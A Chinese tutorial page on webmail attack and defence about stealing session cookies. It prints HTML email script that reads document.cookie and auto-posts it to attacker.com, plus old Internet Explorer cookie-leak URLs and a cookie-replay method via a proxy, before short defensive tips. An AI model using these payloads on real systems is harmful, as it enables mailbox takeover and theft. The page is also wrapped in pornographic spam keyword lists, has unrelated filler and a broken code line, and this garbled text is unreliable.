在线看毛片视频-国产免费av在线-欧美日韩一区二区三区-国产成人无码av在线播放无广告-亚洲人va欧美va人人爽-国产第一草草-西班牙黄色片-四虎在线网站8848-最新av片免费网站入口-东京热无码中文字幕av专区-日本大人吃奶视频xxxx-欧美精品一区二区三区四区五区-国产片天天弄-国产免费内射又粗又爽密桃视频-欧美爱爱网站-日韩v欧美

當前位置:雨林木風下載站 > 安全殺毒教程 > 詳細頁面

Webmail攻防實戰(6)

Webmail攻防實戰(6)

更新時間:2025-10-02 文章作者:未知 信息來源:網絡 閱讀次數:

網絡技術是從1990年代中期發展起來的新技術,它把互聯網上分散的資源融為有機整體,實現資源的全面共享和有機協作,使人們能夠透明地使用資源的整體能力并按需獲取信息。資源包括高性能計算機、存儲資源、數據...
網絡技術是從1990年代中期發展起來的新技術,它把互聯網上分散的資源融為有機整體,實現資源的全面共享和有機協作,使人們能夠透明地使用資源的整體能力并按需獲取信息。資源包括高性能計算機、存儲資源、數據資源、信息資源、知識資源、專家資源、大型數據庫、網絡、傳感器等。 當前的互聯網只限于信息共享,網絡則被認為是互聯網發展的第三階段。
  如果攻擊者能夠獲取用戶WebMail的cookie信息,那么就能很容易地侵入用戶的WebMail。攻擊者如何獲取用戶WebMail的cookie信息呢?如果攻擊者在用戶的電腦上安裝了木馬,或者能夠從網絡線路上對用戶進行嗅探偵聽,那么獲取cookie信息自然不成問題,不過這并不是我們討論問題的意義所在,因為都能夠這樣了,又何必大費周折去獲取cookie信息,直接獲取郵箱密碼就是了。

  如果WebMail系統存在跨站腳本執行漏洞,那么攻擊者就能欺騙用戶從而輕易地獲取cookie信息,雖然眾多網站存在此漏洞,但存在此漏洞的WebMail系統還很少見。

  含有惡性腳本程序的html郵件能使攻擊者獲取WebMail的cookie信息。Html郵件中的腳本程序先提取當前WebMail的cookie信息,然后把它賦值給某個表單元素,再將表單自動提交給攻擊者,攻擊者從而獲得cookie會話信息。下面是一段演示程序:

<body>
<form method="post" action="http://attacker.com/getcookie.cgi" name="myform">
<input name="session" type="hidden">
</form>

<script language="JavaScript">
var cookie=(document.cookie);
alert(cookie);//這一句用于顯示當前cookie信息,當然,攻擊者不會這樣做。
document.myform.session.value=cookie;
document.myform.submit();
</script>

  getcookie.cgi是放在攻擊者web服務器上的一個cgi程序,用于獲取表單提交過來的cookie信息,并且做記錄或者通知攻擊者。當然,攻擊者會把html郵件、getcookie.cgi程序設計得更隱蔽,更具欺騙性,讓用戶難以察覺。

  通常,瀏覽器根據web服務器的域名來分別保存cookie信息,并且只會把cookie信息發送給同一域名的web服務器。不過,瀏覽器的漏洞給攻擊者獲取不同域名的cookie信息創造了機會,Internet Explorer、Netscape和Mozilla等被廣泛使用的瀏覽器都存在過此類漏洞。下面是幾個Internet Explorer瀏覽器(針對IE5.0、IE5.5或IE6.0)泄漏cookie信息的例子:

  (1) Html語言中的object元素用于在當前頁面內嵌入外部對象,但Internet Explorer瀏覽器對object元素屬性的處理不當會導致任意域的cookie信息被泄漏,演示代碼如下:

<object id="data" data="empty.html" type="text/html"></object>
<script>
var ref=document.getElementById("data").object;
ref.location.,5000);
</script>

  (2) Internet Explorer瀏覽器錯誤處理“about”協議使得一個精心構造的URL請求可能會顯示或修改任意域的cookie信息,例如(以下代碼在同一行):

  about://www.anydomain.com/<script language=JavaScript>alert(document.cookie);</script>

  (3) Internet Explorer瀏覽器會誤把URL中“%20”(空格符的URL編碼)字符串之前的主機名當做cookie信息所在的域,并且發送出去。假設攻擊者有一個域名“attacker.com”,攻擊者把它做成泛域名解析,即把“*.attacker.com”指向攻擊者web服務器所在的IP地址,“attacker.com”下的任何子域名或主機名都會被解析成這個IP地址,當用戶提交了類似下面這樣的URL后,瀏覽器就會把“anydomain.com”域名的cookie信息發送給攻擊者:

  http://anydomain.com%20.attacker.com/getcookie.cgi

  如果攻擊者要獲取WebMail的臨時型cookie信息,就會在html郵件中寫入相應的代碼,在用戶瀏覽郵件時,該代碼自動執行,使得攻擊者能夠獲取當前瀏覽器里的臨時cookie信息,也可以把用于獲取cookie信息的URL發送給用戶,誘騙用戶打開該URL,這樣攻擊者也能獲取臨時cookie信息。

  在攻擊者獲取cookie信息后,如果cookie信息里含有密碼等敏感信息,那么攻擊者就能很輕易地侵入用戶的郵箱,雖然hotmail等WebMail系統曾經發生過此類的情況,但cookie信息泄漏敏感信息的WebMail系統還很少見。

  攻擊者在獲取cookie信息之后,還要讓此cookie信息由瀏覽器來存取從而與WebMail系統建立會話,這樣才能侵入用戶的WebMail。如果是持久型cookie信息,攻擊者所要做的是把這個信息復制到自己的cookie文件中去,由瀏覽器存取該cookie信息從而與WebMail系統建立會話,不過臨時cookie信息存儲在內存中,并不容易讓瀏覽器存取。

  為了讓瀏覽器存取臨時cookie信息,攻擊者可以編輯內存中的cookie信息,或者修改公開源代碼的瀏覽器,讓瀏覽器能夠編輯cookie信息,不過這樣都不是很簡便的方法,簡便的方法是使用Achilles程序(packetstormsecurity.org網站有下載)。Achilles是一個http代理服務器,能夠載取瀏覽器和web服務器間的http會話信息,并且在代理轉發數據之前可以編輯http會話以及臨時cookie信息。

  WebMail系統應該避免使用持久型cookie會話跟蹤,使攻擊者在cookie會話攻擊上不能輕易得逞。為了防止cookie會話攻擊,用戶可以采取如下措施以加強安全:

  (1) 設置瀏覽器的cookie安全級別,阻止所有cookie或者只接受某幾個域的cookie。

  (2) 使用cookie管理工具,增強系統cookie安全,如Cookie Pal、Burnt Cookies等。

  (3) 及時給瀏覽器打補丁,防止cookie信息泄漏。



網絡的神奇作用吸引著越來越多的用戶加入其中,正因如此,網絡的承受能力也面臨著越來越嚴峻的考驗―從硬件上、軟件上、所用標準上......,各項技術都需要適時應勢,對應發展,這正是網絡迅速走向進步的催化劑。

溫馨提示:喜歡本站的話,請收藏一下本站!

本類教程下載

系統下載排行

在线看毛片视频-国产免费av在线-欧美日韩一区二区三区-国产成人无码av在线播放无广告-亚洲人va欧美va人人爽-国产第一草草-西班牙黄色片-四虎在线网站8848-最新av片免费网站入口-东京热无码中文字幕av专区-日本大人吃奶视频xxxx-欧美精品一区二区三区四区五区-国产片天天弄-国产免费内射又粗又爽密桃视频-欧美爱爱网站-日韩v欧美
  • <li id="86scu"><menu id="86scu"></menu></li>
    <li id="86scu"></li>
    <button id="86scu"></button>
  • <s id="86scu"></s><button id="86scu"><menu id="86scu"></menu></button>
  • 男生操女生视频在线观看| 一女被多男玩喷潮视频| 能在线观看的av| 免费一级特黄毛片| 毛片在线视频观看| 亚洲视频在线不卡| 一级黄色录像在线观看| 午夜精品中文字幕| 国产乱女淫av麻豆国产| 最新av免费在线观看| 97人人爽人人| 国产青草视频在线观看| 300部国产真实乱| www.日本三级| 18禁免费无码无遮挡不卡网站| 成人av一级片| 亚洲精品手机在线观看| 精品一区二区成人免费视频| 狠狠精品干练久久久无码中文字幕 | 日韩精品久久一区二区| www.av毛片| 日韩av黄色网址| 国产色视频在线播放| 天天综合中文字幕| 可以在线看的av网站| 亚洲视频在线观看一区二区三区| 亚洲一二三区av| 欧美日韩午夜爽爽| 日韩黄色片视频| 国产高清999| 欧美日韩成人免费视频| 亚洲va综合va国产va中文| 激情五月六月婷婷| 日本人视频jizz页码69| 午夜啪啪福利视频| 无码精品国产一区二区三区免费| 伊人五月天婷婷| a√天堂在线观看| 在线观看免费黄色片| av片中文字幕| 国产一区二区四区| 亚洲午夜激情影院| 激情内射人妻1区2区3区| 免费看日本黄色| 五月天激情播播| 国产日产欧美视频| www.日本在线视频| 日韩第一页在线观看| 老司机午夜av| 国产成人a亚洲精v品无码| 免费在线观看污污视频| 亚洲污视频在线观看| 欧美丰满熟妇bbbbbb百度| 国产999免费视频| av污在线观看| 黑森林精品导航| 国产一区亚洲二区三区| 久久久久久久久久网| 欧美一区二区三区综合| 中文字幕av导航| 国产又粗又猛大又黄又爽| 亚洲一区日韩精品| www.亚洲高清| 五月激情婷婷在线| 欧美日韩一区二区三区69堂| 丁香婷婷激情网| 国产欧美高清在线| 天天操天天摸天天爽| 日韩视频第二页| 国产精品69页| 日韩一区二区三区不卡视频| 黄色三级视频片| 亚洲综合av在线播放| 182午夜在线观看| 午夜免费福利网站| 日本福利视频网站| 国产黄色片免费在线观看| 久久手机在线视频| 日日鲁鲁鲁夜夜爽爽狠狠视频97| www.av中文字幕| 日本www在线播放| 在线看的黄色网址| 中国 免费 av| 日韩欧美亚洲天堂| 99热这里只有精品在线播放| 超碰中文字幕在线观看| 亚洲色欲久久久综合网东京热| heyzo国产| 三上悠亚av一区二区三区| 日本三日本三级少妇三级66| 男女猛烈激情xx00免费视频| 欧美日韩亚洲一二三| 国产福利精品一区二区三区| 久久艹国产精品| 成人精品视频一区二区| 亚洲国产精品女人| 日韩伦理在线免费观看| 三级在线免费看| 国产二区视频在线| 国产精品v日韩精品v在线观看| 欧美国产视频一区| 国产熟女高潮视频| 日韩一级特黄毛片| 国产一级做a爰片久久| 精品国产av无码一区二区三区| 九九热在线免费| 欧日韩免费视频| 亚洲第一综合网站| 色免费在线视频| 水蜜桃色314在线观看| 樱花草www在线| 久久久久久久久久久久久久国产| 异国色恋浪漫潭| 99视频在线视频| 日本www在线视频| 今天免费高清在线观看国语| www.com操| 蜜臀久久99精品久久久酒店新书 | 中文字幕在线视频一区二区三区 | 免费高清在线观看免费| 女人帮男人橹视频播放| 做a视频在线观看| 国产自偷自偷免费一区| 青青草原av在线播放| 国产成人一区二区三区别| 亚洲第一天堂久久| 色婷婷综合网站| 鲁一鲁一鲁一鲁一av| 国产精品免费观看久久| 亚洲熟妇av日韩熟妇在线| 国产91沈先生在线播放| 99精品一区二区三区的区别| 国内自拍第二页| www.51色.com| 四虎影院一区二区| 日本免费在线视频观看| 在线观看免费黄色片| 中文字幕第三区| 51自拍视频在线观看| 91大学生片黄在线观看| 影音先锋成人资源网站| 50度灰在线观看| 国产男女免费视频| 欧美丰满熟妇bbbbbb百度| 少妇高潮毛片色欲ava片| 播放灌醉水嫩大学生国内精品| aaaaaa亚洲| 天天摸天天舔天天操| 男人日女人的bb| 国产综合av在线| 69久久久久久| 国产美女视频免费| 国产极品尤物在线| 天天操天天摸天天爽| 国产成年人在线观看| 男人天堂新网址| 中文字幕一区二区三区四区在线视频| 久久99爱视频| 国产a级黄色大片| 妺妺窝人体色www在线观看| 中文av字幕在线观看| 欧美一级免费播放| 超碰超碰在线观看| 免费看欧美一级片| 日韩无套无码精品| 久久久久福利视频| www.日日操| 欧美亚洲色图视频| 99国产精品久久久久久| 国产极品尤物在线| 污污网站免费观看| 亚洲午夜精品久久久久久人妖| 日韩高清第一页| 狠狠97人人婷婷五月| 91免费视频黄| 牛夜精品久久久久久久| 国产自产在线视频| 中国一级黄色录像| 日韩一级免费片| 免费在线激情视频| 成人在线免费高清视频| 久久撸在线视频| 91成人在线观看喷潮教学| 久久精品亚洲天堂| 在线观看国产一级片| 可以在线看的黄色网址| 尤物av无码色av无码| 亚洲色图都市激情| 日本一本在线视频| 日韩一级片播放| 成人免费无码av| 97视频在线免费播放| 国产无限制自拍| 日韩 欧美 视频| 日本一本中文字幕| 一二三四中文字幕| 成人在线免费观看视频网站| 亚洲国产精品影视| 只有这里有精品| 免费看污污视频|